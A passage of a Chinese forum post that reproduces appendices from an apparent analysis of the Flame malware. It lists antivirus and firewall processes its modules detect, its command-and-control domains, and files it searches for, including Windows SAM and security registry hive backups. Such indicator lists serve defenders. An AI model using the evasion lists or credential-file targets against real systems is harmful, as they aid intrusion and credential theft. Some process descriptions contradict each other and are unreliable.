snsmcon.exeSafe'n'Sec嬀/size]图形用户界面是从公司SNSafe与软件属于产品Safe'n'Sec2009的进程文件
vdtask.exe一款虚拟光驱软件
OEInject.exeOmniquad Total Security反病毒软件相关进程。
procguard.exewith description GUIAspect of ProcessGuard is a process file from company DiamondCS belonging toproduct DiamondCS ProcessGuard.
The file is not digitally signed.
UmxCfg.exeTinyFirewall网络防火墙软件相关进程
SpywareTerminatorShield.exepyware Terminator进程一款免费且易用的间谍软件清除软件
fsgk32.exe-Secure反病毒软件相关程序
mpfcm.exe不详
SWNETSUP.exeSophos Anti-Virus反病毒与网络支持服务应用程序相关的进程
UfSeAgnt.exe是趋势Trend Micro出品的PC-cillin反病毒软件的一部分
fsguidll.exe一款功能强大的实时病毒监测和防护系统
clamd.exe杀毒软件Clam AV的相关进程
PXAgent.exe是Prevx Home 安全软件的相关部分
snsupd.exe此文件属于产品SysWatch嬀/size]企业和是由公司匀一匀愀昀攀嬀/size]软件开发。
此文件描述SysWatch嬀/size]客户端更新的一部分
updclient.exeZoneAlarm公司安全软件升级相关程序
tikl.exe恶意键盘记录程序
FirewallGUI.exe一款防火墙个相关程序
ZeroSpyware Lite.exezerospyware反间谍进程
RTT_CRC_Service.exeR-Firewall防火墙的一部分
SfCtlCom.exe是趋势Trend Micro出品的PC-cillin反病毒软件的一部分
FrzState.exe冰点还原产品中的一个进程
avgnt.exe是H+BEDV反病毒产品的一部分,用于扫描你系统的安全问题
cmdagent.exeComodo防火墙进程,能帮助您侦测和清除病毒,它还有Vshield自动监视系统,会常驻在系统托盘,当您从磁盘、网络上、E-mail夹文件中开启文件时便会自动侦测文件的安全性,若文件内含病毒,便会立即警告,并作适当的处理,而且支持鼠标右键的快速选单功能,并可使用密码将个人的设定锁住让别人无法乱改您的设定。
sppfw.exeGmbH公司Securepoint软件程序。防火墙类相关软件进程。
cdinstx.exe杀毒软件anti-spyware进程
aupdrun.exe是Agnitum Outpost Firewall 防火墙自动升级程序
omnitray.exeGenetec Omnicast公司的Network DVR Server进程
Kpf4ss.exeKerio个人防火墙的Windows进程的一部分
gateway.exeWindUpdates的广告计划的一个进程
FSMA32.exeF-Secure反病毒软件的一部分。
SavService.exe是Sophos Anti-Virus Module软件相关进程
BootSafe.exe能够快速重启进入安全模式的小程序
fspc.exeF-Secure的互联网安全套件进程
AntiHook.exeAntiHook控制中心进程
dfw.exeSigns防火墙进程
FSM32.exe是F-Secure反病毒软件的一部分。
Netguard Lite.exeZeroSpyware间碟软件中的一部分
pfsvc.exePrivacyware创建一个Windows文件,防火墙相关软件。
op_mon.exeOutpostFirewall防火墙的实时监控程序
zerospyware le.exeZeroSpyware个人隐私防护软件相关进程
DF5SERV.exe冰点还原产品中的一部分
TmProxy.exe是趋势Trend Micro出品的PC-cillin反病毒软件的一部分。
safensec.exeSafe'n'Sec 产品中的一个进程
FSMB32.exeF-Secure反病毒软件的一部分。
Tray.exeNetVeda Safety.Net安全软件进程。
umxfwhlp.exeTinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件
nvcoas.exeNorman Virus进程
FAMEH32.exeF-Secure Anti-Virus进程
tinykl.exe很好用的微小的键盘纪录工具。
ccSetMgr.exeSymantec公司网络安全套装的一部分
SUPERAntiSpyware.exe是SUPERAntiSpyware反间谍软件的相关部分。
fsav32.exeF-Secure Anti-Virus进程
outpost.exe是Outpost Personal Firewall个人防火墙相关程序。
UmxFwHlp.exe是由TinySoftware出品的一款网络防火墙软件
Fspex.exeF-Secure Anti-Virus相关服务进程
bdagent.exeBitDefenderProfessional杀毒软件相关程序。
wwasher.exeWebwasher安全产品的相关进程
VCATCH.exe属于产品VCatch 2003的CommonSearch的相关进程
spfirewallsvc.exeSecurePoint公司防火墙驱动程序进程
cdas17.exeCyberDefenderAntiSpyware反间谍软件相关进程。
dvpapi.exeAuthentium Antivirus的相关进程
fssm32.exeF-Secure反病毒软件相关程序,用于扫描病毒
livesrv.exe是BitDefenderProfessional杀毒软件在线升级程序
Fsav32.exeF-Secure反病毒软件相关进程
本帖最后由 wobaxindiule 于 2012-8-2 10:16 编辑
附录二
表5-2连接所有域名列表
adhotspot.biz
admin-on.biz
autosync.info
bannerspot.in
bannerzone.in
bestcopytoday.com
bytewiser.com
chchengine.com
chchengine.net
dailynewsupdater.com
dbdrivers.biz
diznet.biz
dnslocation.info
dnsmask.info
dnsportal.info
dnsupdate.info
dvmdownload.net
eventshosting.com
fastestever.net
fastinfo.biz
flashp.webhop.net
flashupdates.info
flushdns.info
isyncautomation.in
isyncautoupdater.in
liveservice.biz
living-help.com
localconf.com
localgateway.info
micromedia.in
mysync.info
netproof.info
netsharepoint.
infonetwork-acs.biz
networkupdate.net
newsflashsite.com
newstatisticfeeder.com
newsync.info
nvidiadrivers.info
nvidiasoft.info
nvidiastream.info
pingserver.info
processrep.com
profcenter.biz
quick-net.info
rendercodec.info
rsscenter.webhop.info
sec-enhanced.org
serveflash.info
serverss.info
smart-access.net
smartservicesite.info
specthosting.biz
syncdomain.info
synclock.info
syncprovider.info
syncsource.info
syncstream.info
syncupdate.info
traffic-spot.biz
traffic-spot.com
ultrasoft.in
update-ver.biz
videosync.info
本帖最后由 wobaxindiule 于 2012-8-2 10:16 编辑
附录三
表5-3advnetcfg.ocx模块检测反病毒软件进程列表,其中有些进程也在别的模块中出现过。
进程名称 说明
fwsrv.exeAVG Firewall Service进程。
ssupdate.exeUPERAntiSpyware 间谍扫描软件进程
zerospyware lite.exezerospyware反间谍进程
dcsuserprot.exeDiamondCSProcessGuard进程一款系统安全程序
spywareterminatorshield.exeSpyware Terminator进程一款免费且易用的间谍软件清除软件
zerospywarelite_installer.exeZeroSpyware相关组件进程
一款个人隐私防护软件
umxagent.exeCA Anti-Virus相关服务进程
fsdfwd.exeF-Secure Anti-Virus相关组件进程
fspex.exeF-Secure Anti-Virus相关服务进程
sab_wab.exeSUPERAntiSpyware相关组件进程
blinkrm.exeeEyt Digital Security公司开发的产品进程。
pxconsole.exePrevx Home反间谍软件进程
jpfsrv.exeJeticoPersonalFirewall的服务进程。
lpfw.exeLavasoft PersonalFirewall进程
updclient.exeZoneAlarm公司安全软件升级相关进程
fameh32.exeF-Secure Anti-Virus进程
blinksvc.exeeEye Digital Security相关组件进程
spyhunter3.exeSpyHunter反间谍软件进程
swupdate.exeSophos AntiVirus进程
nvcoas.exeNorman Virus进程
fch32.exeF-Secure Anti-Virus进程
pgaccount.exe是关于个人帐户的进程项,当注销后用另一个帐户登录计算机,有可能会出现两个该进程项。
blink.exeeEyt数字安全公司开发的产品进程。
umxcfg.exeTinyFirewall网络防火墙软件相关进程。TinyFirewall是TinySoftware出品的一款网络防火墙软件。
zlh.exe是Norman反病毒网络安全套装控制程序。
fsm32.exeF-Secure反病毒软件相关程序,用于管理对病毒扫描的计划任务。
live help.exeWindows32的应用程序相关进程
vcatch.exe属于产品VCatch 2003的CommonSearch的相关进程
icmon.exeSophos AntiVirus防毒检测的活动监视器进程
netguard lite.exeZeroSpyware间碟软件中的一部分
cpf.exeComodoPersonalFirewall主程序。
nip.exe是Norman反病毒软件控制台程序。它用于实时扫描监控POP3、SMTP和NNTP协议病毒。
asr.exeAdvanced_Spyware_Remover反间谍软件程序。
nvcsched.exeNVCSched.exe是Norman病毒控制台计划任务程序,用于进行计划扫描任务。
ipctray.exeNetVeda Safety.Net安全软件进程。
sp_rsser.exeSpywareTerminator反间谍软件相关程序。
firewall 2004.exeWyvernWorks Firewall2004软件进程。
kpf4gui.exe是Kerio个人防火墙相关进程。
ipcsvc.exeNetVeda Safety.Net安全软件进程。
sppfw.exeGmbH公司Securepoint软件程序。防火墙类相关软件进程。
avp.exe卡巴斯基杀毒软件相关程序。
fsgk32st.exeF-Secure反病毒软件相关程序。
zlclient.exeZoneAlarm个人防火墙的客户端程序。
fsguiexe.exeF-Secure反病毒软件相关程序。
umxpol.exeTinyFirewall是由TinySoftware出品的一款网络防火墙软件
umxtray.exeTinyFirewall是由TinySoftware出品的一款网络防火墙软件
cclaw.exeNorman反病毒软件病毒控制程序
zanda.exeNorman反病毒产品控制程序,同时是驻留精灵程序。
rtt_crc_service.exeR-Firewall防火墙相关程序
fsaua.exe-Secure公司的自动更新代理
fsqh.exeF-secure反病毒软件的隔离管理工具
pcipprev.exe防火墙软件
ipatrol.exe互联网安全联盟,安全软件
licwiz.exe不详
nstzerospywarelite.exe反间谍软件的一部分
njeeves.exeNorman反病毒产品的一部分
vsmon.exeZoneAlarm个人防火墙的一部分
fsbwsys.exeF-secure反病毒软件的相关程序
vdtask.exe一款虚拟光驱软件
procguard.exe是一个安全软件
fsgk32.exeF-Secure反病毒软件相关程序
umxlu.exeTinyFirewall是由TinySoftware出品的一款网络防火墙软件。
fsguidll.exeF-SecureAnti公司的-VirusClientSecurity是一款功能强大的实时病毒监测和防护系统相关程序
clamd.exe杀毒软件Clam AV的相关进程
fsma32.exeF-Secure反病毒软件的一部分。
rdtask.exeWindows系统进程
wsweepnt.exeSophos Anti-Virus进程
jpf.exeJeticoPersonalFirewall是一款功能全面且简单易用的网络防护软件,可以有效确保计算机免受黑客侵扰
tikl.exe恶意键盘记录程序
kpf4ss.exe是Kerio个人防火墙的Windows进程的一部分
superantispyware.exe是SUPERAntiSpyware反间谍软件的相关部分。
pxagent.exePrevx Home 安全软件的相关部分
fsmb32.exe是F-Secure反病毒软件的一部分。
cmdagent.exeComodo防火墙进程,能帮助您侦测和清除病毒
cdinstx.exe毒软件anti-spyware进程
swnetsup.exeSophos Anti-Virus反病毒与网络支持服务应用程序相关的进程
bootsafe.exe能够快速重启进入安全模式的小程序
fspc.exeF-Secure的互联网安全套件进程
antihook.exeAntiHook控制中心进程
dfw.exeSigns防火墙进程
elogsvc.exeEntrust Entelligence安全软件进程。
spywareterminator.exeCrawler杀毒软件相关进程
op_mon.exeOutpostFirewall防火墙的实时监控程序
zerospyware le.exeZeroSpyware个人隐私防护软件相关进程
fssm32.exe是F-Secure反病毒软件的一部分。
umxfwhlp.exeTinyFirewall相关进程。TinyFirewall是由 TinySoftware出品的一款网络防火墙软件
authfw.exeAuthentium Firewall进程
tinykl.exe很好用的微小的键盘纪录工具
r-firewall.exeR-Firewall个人防火墙进程。
fsav32.exeF-Secure反病毒软件相关进程
wwasher.exeWebwasher安全产品的相关进程
spfirewallsvc.exeSecurePoint公司防火墙驱动程序进程
cdas17.exeCyberDefenderAntiSpyware反间谍软件相关进程。
dvpapi.exeAuthentium Antivirus的相关进程
nvoy.exeZeroSpyware个人隐私防护软件相关进程
eeyeevnt.exeeEye数字安全套件相关进程
本帖最后由 wobaxindiule 于 2012-8-2 16:14 编辑
附录四
表5-4Nteps32.ocx模块检测反病毒软件进程列表,其中有些进程也在别的模块中出现过。
进程名称 说明
avgamsvr.exeAVG Antivirus 组件进程
fwsrv.exeJetico Personal Firewall 进程一款全面而又简单易用的个人网络防火墙
ssupdate.exeSUPERAntiSpyware 间谍扫描软件进程
kavmm.exeKaspersky Anti-Virus Personal Pro 5 进程
emlproxy.exeQuick Heal AntiVirus进程一款印度的著名安全软件
xauth_service.exe不详
mpsvc.exe微点主动防御进程
fprottray.exeF-Prot AntiVirus 相关组件进程
dcsuserprot.exeDiamondCS ProcessGuard进程一款系统安全程序
spywareterminatorshield.exeSpyware Terminator进程一款免费且易用的间谍软件清除软件
zerospyware lite_installer.exeZeroSpyware相关组件进程
umxagent.exeCA Anti-Virus相关服务进程
fsdfwd.exeF-Secure Anti-Virus相关组件进程
fsrt.exeFortres Security进程
rdtask.exeWindows系统进程
fspex.exeF-Secure Anti-Virus相关服务进程
sab_wab.exe不详
avgemc.exeAVG Anti-Virus进程
emlproui.exeQuick Heal AntiVirus进程
avgcc.exeAVG Anti-Virus进程
pxconsole.exePrevx Home反间谍软件进程
authfw.exeAuthentium Firewall进程
app_firewall.exeNetScaler App Firewall进程
lpfw.exeLavasoft Personal Firewall进程
avgupsvc.exeAVG Anti-Virus进程
wsweepnt.exeSophos Anti-Virus进程
fameh32.exeF-Secure Anti-Virus进程
blinksvc.exeeEye Digital Security相关组件进程
spyhunter3.exeSpyHunter反间谍软件进程
fxsrv.exe不详
swupdate.exeSophos AntiVirus进程
nvcoas.exeNorman Virus进程
fch32.exeF-Secure Anti-Virus进程
zerospyware lite.exezerospyware反间谍软件进程
tsatisy.exeOmniquad AntiSpy软件进程。AntiSpy 可以帮你清除Cookies、浏览网站纪录、网络缓存文件、Windows操作系统中的打开程序纪录、最近打开文件,甚至于Media Player中的打开纪录也可一并清空。
pgaccount.exe 是关于个人帐户的进程项,当注销后用另一个帐户登录计算机,有可能会出现两个该进程项。
blink.exeeEyt数字安全公司开发的产品进程。
umxcfg.exe TinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件。
zlh.exe ZLH.exe是Norman反病毒网络安全套装控制程序。
fsm32.exe F-Secure反病毒软件相关程序,用于管理对病毒扫描的计划任务。
avginet.exe AVGAnti-Virus/Spyware软件的在线升级程序。
scanwscs.exe Quick Heal Technologies公司QuickHeal反病毒软件产品进程。
elogsvc.exe 来自EntrustEntelligence安全软件进程。
configmgr.exeIBM Case Manager中进程。
vcatch.exe 不详
winlogon.exeWindows Logon Process,WindowsNT 用户登陆程序,管理用户登录和退出。
tinykl.exe很好用的微小的键盘纪录工具。
netguard lite.exe不详
blinkrm.exeeEyt Digital Security公司开发的产品进程。
netmon.exe是NetworkMonitor一款用于管理和监测网络状况的软件进程,或netmon.exe是一个注册的群发邮件蠕虫的进程(小邮差病毒变种Worm.Mimail.m)。
ike.exe不详
cpf.exeComodoPersonalFirewall主程序。ComodoPersonalFirewall是一款功能强大的、高效的且容易使用的安全防护软件。
avgfwsrv.exeAVG Firewall Service进程。
asr.exeAdvanced_Spyware_Remover反间谍软件程序。
nvcsched.exeNVCSched.exe是Norman病毒控制台计划任务程序,用于进行计划扫描任务。
ipctray.exeNetVeda Safety.Net安全软件进程。
sp_rsser.exeSpywareTerminator反间谍软件相关程序。
firewall 2004.exeWyvernWorks Firewall 2004软件进程。
kpf4gui.exe是Kerio个人防火墙相关进程。
ipcsvc.exeNetVeda Safety.Net安全软件进程。
kav.exekav.exe是卡巴斯基KasperskyAnti-Virus反病毒软件的一部分。
sppfw.exeGmbH公司Securepoint软件程序。防火墙类相关软件进程。
avp.exe卡巴斯基杀毒软件相关程序。
tsmpnt.exeOmniquad MyPrivacy软件进程。Omniquad MyPrivacy 是款通过彻底删除留在计算机上的隐蔽信息来保护你的隐私的软件。
fsgk32st.exeF-Secure反病毒软件相关程序。
zlclient.exeZoneAlarm个人防火墙的客户端程序。
fsguiexe.exeF-Secure反病毒软件相关程序。
r-firewall.exeR-Firewall个人防火墙进程。
sww.exe产品名称:爽歪歪,爽歪歪是一款游戏外挂。包括天空小小岛,小小岛,冒险岛等游戏的外挂。
tscutynt.exe产品名称:Omniquad Total Security,是一个安全软件。
cdas17.exe不详
cclaw.execclaw.exe是Norman反病毒软件病毒控制程序。同时用于Norman反病毒扫描器。
avpm.exeavpm.exe是卡巴斯基Kaspersky公司出品的反病毒套装的一部分。用于保护你的计算机免受网络威胁的攻击。
zanda.exeNorman反病毒产品控制程序,同时是驻留精灵程序。
rtt_crc_service.exe此文件是R-Firewall防火墙的一部分。
fsaua.exe该进程属于F-Secure公司的自动更新代理。非系统进程。F-Secure 原名Data Fellows,是欧洲乃至世界知名的计算机及网络安全提供商。1999年该公司在赫尔辛基证券交易所(OMXNordic Exchange Helsinki)成功上市。
fsqh.exeF-secure反病毒软件的隔离管理工具,在F-secure防病毒系统中用于集中隔离病毒。
pcipprev.exe防火墙软件。
ipatrol.exe 安全软件,互联网安全联盟公司出品。
licwiz.exe有关间谍软件的恶意文件。
nstzerospywarelite.exe防火墙软件。
njeeves.exe NJeeves.exe是Norman反病毒产品的一部分。它用于发送消息给Norman反病毒控制不同模块。同时也用于隔离区文件夹功能。
vsmon.exeZoneAlarm个人防火墙的一部分。它用于监视网络浏览和对网络攻击进行警报。
fsbwsys.exeF-Secure Internet Security Suite 公司的安全软件。
vdtask.exe虚拟光盘)是一款虚拟光驱软件。
procguard.exe安全软件。
fsgk32.exeF-Secure反病毒软件相关程序。F-SecureAnti-VirusClientSecurity是一款功能强大的实时病毒监测和防护系统,支持所有的Windows平台,它集成了多个病毒监测引擎,如果其中一个发生遗漏,就会有另一个去监测。
umxlu.exeTinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件。
onlnsvc.exe某公司的安全软件。
fsguidll.exeF-Secure反病毒软件相关程序。
clamd.exe危险的病毒程序。
services.exeservices.exe是微软Windows操作系统的一部分。用于管理启动和停止服务。
fsma32.exefsm32.exe是F-Secure反病毒软件的一部分。
oeinject.exe不详
updclient.exe不详
jpf.exeJeticoPersonalFirewall的相关进程,JeticoPersonalFirewall是一款功能全面且简单易用的网络防护软件,可以有效确保计算机免受黑客侵扰。
tikl.exe恶意键盘记录程序。
kpf4ss.exe是Kerio个人防火墙的Windows进程的一部分。
pfsvc.exepfsvc.exe是由Privacyware创建一个Windows文件,防火墙相关软件。
superantispyware.exe是SUPERAntiSpyware反间谍软件的相关部分。
pxagent.exe是PrevxHome 安全软件的相关部分。
fsmb32.exefsm32.exe是F-Secure反病毒软件的一部分。
cmdagent.exeComodo防火墙进程,能帮助您侦测和清除病毒,它还有Vshield自动监视系统,会常驻在系统托盘,当您从磁盘、网络上、E-mail夹文件中开启文件时便会自动侦测文件的安全性,若文件内含病毒,便会立即警告,并作适当的处理,而且支持鼠标右键的快速选单功能,并可使用密码将个人的设定锁住让别人无法乱改您的设定。
cdinstx.exe杀毒软件anti-spyware进程。
omnitray.exeGenetec Omnicast公司的Network DVRServer进程。
avgrssvc.exeAVG Anti-Virus杀毒软件的Resident Shield模块进程。
vsdesktop.exeVirtual Sandbox 2.0 Build 209子进程。
swnetsup.exeSophos Anti-Virus反病毒与网络支持服务应用程序相关的进程。
fpavserver.exeF-PROT Antivirus系统服务进程。
gateway.exeWindUpdates的广告计划的一个进程。
tray.exe雅虎天盾的进程。
bootsafe.exe能够快速重启进入安全模式的小程序。
fspc.exeF-Secure的互联网安全套件进程。
antihook.exeAntiHook控制中心进程。
dfw.exe8Signs防火墙进程。
live help.exeWindows32的应用程序相关进程。
pf6.exePrivatefirewall相关进程。
spywareterminator.exeCrawler杀毒软件相关进程。
op_mon.exeOutpostFirewall防火墙的实时监控程序。
zerospyware le.exeZeroSpyware个人隐私防护软件相关进程。
nvoy.exeNorman AntiVirus杀毒软件相关进程。
umxfwhlp.exeTinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件。
tsansrf.exeOmniquad Anonymous Surfing安全套件相关进程。
fw.exeSoftPerfect个人防火墙相关进程。
jpfsrv.exeJeticoPersonalFirewall是一款功能全面且简单易用的网络防护软件,可以有效确保计算机免受黑客侵扰。
icmon.exeSophos AntiVirus防毒检测的活动监视器进程。
umxpol.exeTinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件。
fsav32.exeF-Secure反病毒软件相关进程。
onlinent.exeQuick Heal Total安全产品相关进程。
explorer.exeWindows32的应用程序,位于C:\windows\目录下,windows资源管理器程序。
wwasher.exeWebwasher安全产品的相关进程。
spfirewallsvc.exeSecurePoint公司防火墙驱动程序进程。
umxtray.exeTinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件。
dvpapi.exeAuthentium Antivirus的相关进程。
fssm32.exeF-Secure反病毒软件相关程序,用于扫描病毒。
eeyeevnt.exeeEye数字安全套件相关进程。
xfilter.exe费尔防火墙的相关进程。
本帖最后由 wobaxindiule 于 2012-8-2 16:15 编辑
附录五
表5-5Browse32.ocx模块遍历计算机系统中是否有如下文件列表。
"C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\ssitable" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\mscrypt.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\lmcache.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\ntcache.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\mspovst.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\mscorest.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\Lncache.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\dmmsap.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\syscache.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\domm.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\syscache3.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\domm3.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\nt2cache.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\domm2.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\ltcache.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\dommt.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\wavesup3.drv" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\comspol32.ocx" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\indsvc32.ocx" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\scaud32.exe" "C:\WINDOWS\system32\sstab11.dat" "C:\WINDOWS\system32\comspol32.ocx" "C:\WINDOWS\system32\sstab12.dat" "C:\WINDOWS\system32\comspol32.ocx" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winrt32.dll" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winrt32.ocx" "C:\WINDOWS\system32\winconf32.ocx" "C:\WINDOWS\system32\mssui.drv" "C:\WINDOWS\system32\indsvc32.dll" "C:\WINDOWS\system32\indsvc32.ocx" "C:\WINDOWS\system32\modevga.com" "C:\WINDOWS\system32\commgr32.dll" "C:\WINDOWS\system32\watchxb.sys" "C:\WINDOWS\system32\scaud32.exe" "C:\WINDOWS\system32\sdclt32.exe" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\scsec32.exe" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\mpgaud.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\m4aaux.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\wpgfilter.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\audcache" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\audfilter.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\m3aaux.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\m3afilter.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\m3asound.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\m4afilter.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\m4asound.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\m5aaux.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\m5afilter.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\m5asound.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\mpgaaux.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\qpgaaux.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\mlcache.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\srcache.dat" "C:\WINDOWS\Ef_trace.log" "C:\WINDOWS\repair\system" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~rei525.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~rei524.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\GRb9M2.bat" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~a28.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~dra51.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~TFL849.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~TFL848.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFL546.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFL544.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFL544.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFL543.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFL543.tmp" "C:\WINDOWS\repair\sam" "C:\WINDOWS\repair\security" "C:\WINDOWS\repair\default" "C:\WINDOWS\repair\software" "C:\WINDOWS\Prefetch\Layout.ini" "C:\WINDOWS\Prefetch\NTOSBOOT-B00DFAAD.pf" "C:\WINDOWS\system32\config\sam.sav" "C:\WINDOWS\system32\config\security.sav" "C:\WINDOWS\system32\config\default.sav" "C:\WINDOWS\system32\config\software.sav" "C:\WINDOWS\system32\config\system.sav" "C:\WINDOWS\system32\config\userdiff.sav" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\sstab.dat" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\sstab.dat" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~dra52.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~ZFF042.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\sstab15.dat" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpab32.bat" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpab32.bat" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DF05AC8.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFD85D3.tmp" "C:\WINDOWS\system32\pcldrvx.ocx" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\dstrlog.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAudio\dstrlogh.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAuthCtrl\authcfg.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAuthCtrl\ctrllist.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAuthCtrl\lmcache.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAuthCtrl\ntcache.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAuthCtrl\posttab.bin" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAuthCtrl\secindex.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSAuthCtrl\tokencpt" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\dstrlog.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\dstrlogh.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\rccache.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSecurityMgr\rccache.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSndMix\audtable.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSndMix\fmpidx.bin" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSndMix\lrlogic" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSndMix\mixercfg.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSndMix\sndmix.drv" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSndMix\lmcache.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSndMix\ntcache.dat" "C:\ProgramFiles\Common Files\Microsoft Shared\MSSndMix\mixerdef.dat" "C:\WINDOWS\system32\msglu32.ocx" "C:\WINDOWS\Temp\~8C5FF6C.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~dra53.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV084.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV294.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV473.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV751.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV751.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~KWI988.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~KWI989.tmp" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~rf288.tmp" "C:\WINDOWS\system32\advnetcfg.ocx" "C:\WINDOWS\system32\advpck.dat" "C:\WINDOWS\system32\authpack.ocx" "C:\WINDOWS\system32\boot32drv.sys" "C:\WINDOWS\system32\ccalc32.sys" "C:\WINDOWS\system32\comspol32.dll" "C:\WINDOWS\system32\ctrllist.dat" "C:\WINDOWS\system32\mssvc32.ocx" "C:\WINDOWS\system32\ntaps.dat" "C:\WINDOWS\system32\nteps32.ocx" "C:\WINDOWS\system32\rpcnc.dat" "C:\WINDOWS\system32\soapr32.ocx" "C:\WINDOWS\system32\sstab.dat" "C:\WINDOWS\system32\sstab0.dat" "C:\WINDOWS\system32\sstab1.dat" "C:\WINDOWS\system32\sstab10.dat" "C:\WINDOWS\system32\sstab2.dat" "C:\WINDOWS\system32\sstab3.dat" "C:\WINDOWS\system32\sstab4.dat" "C:\WINDOWS\system32\sstab5.dat" "C:\WINDOWS\system32\sstab6.dat" "C:\WINDOWS\system32\sstab7.dat" "C:\WINDOWS\system32\sstab8.dat" "C:\WINDOWS\system32\sstab9.dat" "C:\WINDOWS\system32\msglu32.ocx" 